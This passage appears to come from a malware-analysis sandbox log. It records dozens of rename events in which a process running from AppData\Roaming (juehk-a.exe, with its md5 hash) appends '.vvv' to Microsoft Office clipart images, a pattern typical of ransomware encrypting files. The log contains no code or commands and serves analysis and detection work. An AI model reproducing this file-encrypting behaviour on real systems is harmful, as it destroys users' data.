- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0287644.JPG.vvv
- ads:
- fid (ads:): 562949953498348
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 96066
- mode: rename
- sequenceNumber: 2151
- filesize: 36654
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0287645.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0287645.JPG.vvv
- ads:
- fid (ads:): 562949953498349
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 96076
- mode: rename
- sequenceNumber: 2152
- filesize: 11982
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0289430.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0289430.JPG.vvv
- ads:
- fid (ads:): 562949953498350
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 96089
- mode: rename
- sequenceNumber: 2153
- filesize: 11118
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0309480.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0309480.JPG.vvv
- ads:
- fid (ads:): 562949953498382
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 96101
- mode: rename
- sequenceNumber: 2154
- filesize: 21998
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0309567.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0309567.JPG.vvv
- ads:
- fid (ads:): 562949953498383
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 96112
- mode: rename
- sequenceNumber: 2155
- filesize: 39982
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0309585.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0309585.JPG.vvv
- ads:
- fid (ads:): 562949953498384
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 96143
- mode: rename
- sequenceNumber: 2156
- filesize: 33694
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0309598.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0309598.JPG.vvv
- ads:
- fid (ads:): 562949953498385
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 96467
- mode: rename
- sequenceNumber: 2157
- filesize: 44126
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0309664.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0309664.JPG.vvv
- ads:
- fid (ads:): 562949953498386
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 96479
- mode: rename
- sequenceNumber: 2158
- filesize: 19582
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0309705.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0309705.JPG.vvv
- ads:
- fid (ads:): 562949953498387
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 96492
- mode: rename
- sequenceNumber: 2159
- filesize: 37566
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0313896.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0313896.JPG.vvv
- ads:
- fid (ads:): 562949953498391
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 96507
- mode: rename
- sequenceNumber: 2160
- filesize: 43262
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0313965.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0313965.JPG.vvv
- ads:
- fid (ads:): 562949953498392
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 96518
- mode: rename
- sequenceNumber: 2161
- filesize: 33614
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0313970.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0313970.JPG.vvv
- ads:
- fid (ads:): 562949953498393
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 96530
- mode: rename
- sequenceNumber: 2162
- filesize: 47998
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0313974.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0313974.JPG.vvv
- ads:
- fid (ads:): 562949953498394
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 96732
- mode: rename
- sequenceNumber: 2163
- filesize: 17054
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0314068.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0314068.JPG.vvv
- ads:
- fid (ads:): 562949953498395
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 96743
- mode: rename
- sequenceNumber: 2164
- filesize: 19630
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0315580.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0315580.JPG.vvv
- ads:
- fid (ads:): 562949953498396
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 96755
- mode: rename
- sequenceNumber: 2165
- filesize: 17374
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0315612.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0315612.JPG.vvv
- ads:
- fid (ads:): 562949953498397
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 96766
- mode: rename
- sequenceNumber: 2166
- filesize: 9854
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0321179.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0321179.JPG.vvv
- ads:
- fid (ads:): 562949953498401
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 96778
- mode: rename
- sequenceNumber: 2167
- filesize: 13326
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0337280.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0337280.JPG.vvv
- ads:
- fid (ads:): 562949953498404
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 96788
- mode: rename
- sequenceNumber: 2168
- filesize: 10622
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341328.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341328.JPG.vvv
- ads:
- fid (ads:): 562949953498405
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 96799
- mode: rename
- sequenceNumber: 2169
- filesize: 11902
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341344.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341344.JPG.vvv
- ads:
- fid (ads:): 562949953498406
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 96810
- mode: rename
- sequenceNumber: 2170
- filesize: 19982
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341439.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341439.JPG.vvv
- ads:
- fid (ads:): 562949953498407
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 96821
- mode: rename
- sequenceNumber: 2171
- filesize: 19582
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341447.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341447.JPG.vvv
- ads:
- fid (ads:): 562949953498408
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 96834
- mode: rename
- sequenceNumber: 2172
- filesize: 21614
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341448.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341448.JPG.vvv
- ads:
- fid (ads:): 562949953498409
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 96850
- mode: rename
- sequenceNumber: 2173
- filesize: 30206
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341455.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341455.JPG.vvv
- ads:
- fid (ads:): 562949953498410
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 96862
- mode: rename
- sequenceNumber: 2174
- filesize: 43918
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341475.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341475.JPG.vvv
- ads:
- fid (ads:): 562949953498411
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 96875
- mode: rename
- sequenceNumber: 2175
- filesize: 16526
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341499.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341499.JPG.vvv
- ads:
- fid (ads:): 562949953498412
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 96888
- mode: rename
- sequenceNumber: 2176
- filesize: 8494
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341534.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341534.JPG.vvv
- ads:
- fid (ads:): 562949953498413
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 96903
- mode: rename
- sequenceNumber: 2177
- filesize: 23550
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341551.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341551.JPG.vvv
- ads:
- fid (ads:): 562949953498414
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 96917
- mode: rename
- sequenceNumber: 2178
- filesize: 28910
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341554.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341554.JPG.vvv
- ads:
- fid (ads:): 562949953498415
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 96931
- mode: rename
- sequenceNumber: 2179
- filesize: 27726
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341557.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341557.JPG.vvv
- ads:
- fid (ads:): 562949953498416
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 96981
- mode: rename
- sequenceNumber: 2180
- filesize: 27166
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341559.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341559.JPG.vvv
- ads:
- fid (ads:): 562949953498417
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 97030
- mode: rename
- sequenceNumber: 2181
- filesize: 42558
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341561.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341561.JPG.vvv
- ads:
- fid (ads:): 562949953498418
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 97061
- mode: rename
- sequenceNumber: 2182
- filesize: 8222
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341634.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341634.JPG.vvv
- ads:
- fid (ads:): 562949953498419
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 97074
- mode: rename
- sequenceNumber: 2183
- filesize: 14270
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341636.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341636.JPG.vvv
- ads:
- fid (ads:): 562949953498420
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 97088
- mode: rename
- sequenceNumber: 2184
- filesize: 8654
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341645.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341645.JPG.vvv
- ads:
- fid (ads:): 562949953498421
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 97101
- mode: rename
- sequenceNumber: 2185
- filesize: 16286
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341653.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341653.JPG.vvv
- ads:
- fid (ads:): 562949953498422
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 97114
- mode: rename
- sequenceNumber: 2186
- filesize: 16158
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341654.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341654.JPG.vvv
- ads:
- fid (ads:): 562949953498423
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 97128
- mode: rename
- sequenceNumber: 2187
- filesize: 20590
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341738.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341738.JPG.vvv
- ads:
- fid (ads:): 562949953498424
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 97159
- mode: rename
- sequenceNumber: 2188
- filesize: 19294
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341742.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341742.JPG.vvv
- ads:
- fid (ads:): 562949953498425
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 97173
- mode: rename
- sequenceNumber: 2189
- filesize: 68990
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382836.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382836.JPG.vvv
- ads:
- fid (ads:): 562949953498426
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 97188
- mode: rename
- sequenceNumber: 2190
- filesize: 118782
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382925.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382925.JPG.vvv
- ads:
- fid (ads:): 562949953498427
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 97203
- mode: rename
- sequenceNumber: 2191
- filesize: 92366
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382926.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382926.JPG.vvv
- ads:
- fid (ads:): 562949953498428
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 97219
- mode: rename
- sequenceNumber: 2192
- filesize: 129550
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382927.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382927.JPG.vvv
- ads:
- fid (ads:): 562949953498429
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 97237
- mode: rename
- sequenceNumber: 2193
- filesize: 113118
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382930.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382930.JPG.vvv
- ads:
- fid (ads:): 562949953498430
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 97291
- mode: rename
- sequenceNumber: 2194
- filesize: 123118
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382931.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382931.JPG.vvv
- ads:
- fid (ads:): 562949953498431
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 97307
- mode: rename
- sequenceNumber: 2195
- filesize: 99966
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382938.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382938.JPG.vvv
- ads:
- fid (ads:): 562949953498432
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 97327
- mode: rename
- sequenceNumber: 2196
- filesize: 109902
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382939.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382939.JPG.vvv
- ads:
- fid (ads:): 562949953498433
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 97344
- mode: rename
- sequenceNumber: 2197
- filesize: 91870
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382942.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382942.JPG.vvv
- ads:
- fid (ads:): 562949953498434
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 97359
- mode: rename
- sequenceNumber: 2198
- filesize: 81854
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382944.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382944.JPG.vvv
- ads:
- fid (ads:): 562949953498435
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 97374
- mode: rename
- sequenceNumber: 2199
- filesize: 87230
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382947.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382947.JPG.vvv
- ads:
- fid (ads:): 562949953498436
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 97388
- mode: rename
- sequenceNumber: 2200
- filesize: 110302
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382948.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382948.JPG.vvv
- ads:
- fid (ads:): 562949953498437
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 97402
- mode: rename
- sequenceNumber: 2201
- filesize: 96894
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382950.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382950.JPG.vvv
- ads:
- fid (ads:): 562949953498438
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 97418
- mode: rename
- sequenceNumber: 2202
- filesize: 96494
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382952.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382952.JPG.vvv
- ads:
- fid (ads:): 562949953498439
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 97431
- mode: rename
- sequenceNumber: 2203
- filesize: 89118
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382954.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382954.JPG.vvv
- ads:
- fid (ads:): 562949953498440
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 97446
- mode: rename
- sequenceNumber: 2204
- filesize: 90510
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382955.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382955.JPG.vvv
- ads:
- fid (ads:): 562949953498441
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 97461
- mode: rename
- sequenceNumber: 2205
- filesize: 109454
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382957.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382957.JPG.vvv
- ads:
- fid (ads:): 562949953498442
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 97503
- mode: rename
- sequenceNumber: 2206
- filesize: 103822
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382958.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382958.JPG.vvv
- ads:
- fid (ads:): 562949953498443
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 97518
- mode: rename
- sequenceNumber: 2207
- filesize: 86318
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382959.JPG
- new_name: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382959.JPG.vvv
- ads:
- fid (ads:): 562949953498444
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 97532
- mode: rename
- sequenceNumber: 2208
- filesize: 107934
- processinfo:
- pid: 1648
